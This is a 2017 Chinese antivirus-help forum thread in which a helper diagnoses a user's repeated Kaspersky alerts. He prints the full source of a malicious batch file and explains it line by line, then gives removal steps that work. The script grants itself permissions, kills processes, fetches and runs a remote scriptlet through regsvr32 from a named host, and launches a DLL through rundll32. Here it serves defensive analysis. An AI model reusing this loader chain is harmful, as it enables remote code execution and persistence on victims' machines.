最近三天卡巴老是报内存有毒是怎么回事

显示全部楼层 · 发表于 2017-1-15 11:43:35

本帖最后由 Wesly.Zhang 于 2017-1-15 11:44 编辑

米兰的小铁匠abc 发表于 2017-1-14 12:49
好吧，今天早上开机还是这样，只不过这次屏幕上打出了fan error的错误，拔插内存后正常进入系统，卡巴斯 ...

Hello，

你把附图所示的文件打包上传到这里来。

c:\windows\debug\item.dat
c:\windows\system32\wbem\123.bat

显示全部楼层 · 发表于 2017-1-15 13:10:40

开机报风扇错误和卡巴报毒是两码事吧？

显示全部楼层 · 发表于 2017-1-15 13:35:29

Wesly.Zhang 发表于 2017-1-15 11:43
Hello，

你把附图所示的文件打包上传到这里来。

昨天我把主板电池扣了，今天早上没有报硬件异常，卡巴执行快速扫描依然报毒。另外c:\windows\debug\item.dat这个文件昨天被卡巴给杀掉了

，123.dat还在，链接：http://pan.baidu.com/s/1kUChOOn 密码：gnpw

显示全部楼层 · 发表于 2017-1-15 13:38:39

Wesly.Zhang 发表于 2017-1-15 11:43
Hello，

你把附图所示的文件打包上传到这里来。

好吧，我在卡巴隔离区找到了item.dat

，已上传

显示全部楼层 · 发表于 2017-1-15 13:53:22

远程脚本执行？

显示全部楼层 · 发表于 2017-1-15 14:07:00

本帖最后由 Wesly.Zhang 于 2017-1-15 14:12 编辑

米兰的小铁匠abc 发表于 2017-1-15 13:38
好吧，我在卡巴隔离区找到了item.dat，已上传

Hello,

你这个 123.bat 源码：

[mw_shl_code=shell,false]@echo off
mode con: cols=13 lines=1
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f&cacls C:\windows\system32\cacls.exe /e /g system:f&cacls C:\windows\system32\cmd.exe /e /g system:f&cacls C:\windows\system32\ftp.exe /e /g system:f&cacls C:\windows\system32\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://js.f4321y.com:280/v.sct scrobj.dll
if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
exit[/mw_shl_code]

解释下：第三行 cacls 开头行是修改运行权限。第四行强制杀死所有regsvr32.exe与rundlll32进程。第五行注册某些dll文件，第六行：设定文件目录属性，第七行：重远端下载文件http://js.f4321y.com:280/v.sct，此文件是一个脚本（目前不可访问）并运行启动来卸载脚本指定的com组件，这是一种比较常规的WMI注册COM组件式的sct攻击。第八行：如果 item.dat 存在则执行起导出表中名称为 aaa 的服务名来运行（典型的Dll传参运行）。怪不得AVP会报 WMIRunner，这种一般很少会用到。

以上分析完成后，你现在需要做的就是处理掉两个注册表启动项目。HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，如上注册表项目内删除有关于 item.dat 与 123.bat 的注册表项目，然后计算机上制定位置在删除有关文件，然后重启计算机，看看还会出现卡巴斯基的检测此威胁的报警。

显示全部楼层 · 发表于 2017-1-15 15:03:43

本帖最后由米兰的小铁匠abc 于 2017-1-15 15:05 编辑

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run内的有关于 item.dat 与 123.bat 的注册表项目已经删除；c盘下的item.dat和123.bat也已经删除；重启电脑后没有出现异常。

显示全部楼层 · 发表于 2017-1-15 15:04:23

Wesly.Zhang 发表于 2017-1-15 14:07
Hello,

你这个 123.bat 源码：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run内的有关于 item.dat 与 123.bat 的注册表项目已经删除；c盘下的item.dat和123.bat也已经删除；重启电脑后没有出现异常。
然后问一下：1、这个病毒会造成什么影响，比如期间登录的账户密码会不会泄露；2、是什么原因造成的，以后要怎么防范

显示全部楼层 · 发表于 2017-1-15 15:39:09

米兰的小铁匠abc 发表于 2017-1-15 15:04
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run内的有关于 item.dat 与 123.bat ...

Hello,

我给你的意见很简单，破解软件不用。

显示全部楼层 · 发表于 2017-1-15 16:18:38

Wesly.Zhang 发表于 2017-1-15 14:07
Hello,

你这个 123.bat 源码：

弱弱的问下，为什么卡巴只检测到了内存，其他的什么都干不了。。。

[交流探讨] 最近三天卡巴老是报内存有毒是怎么回事

评分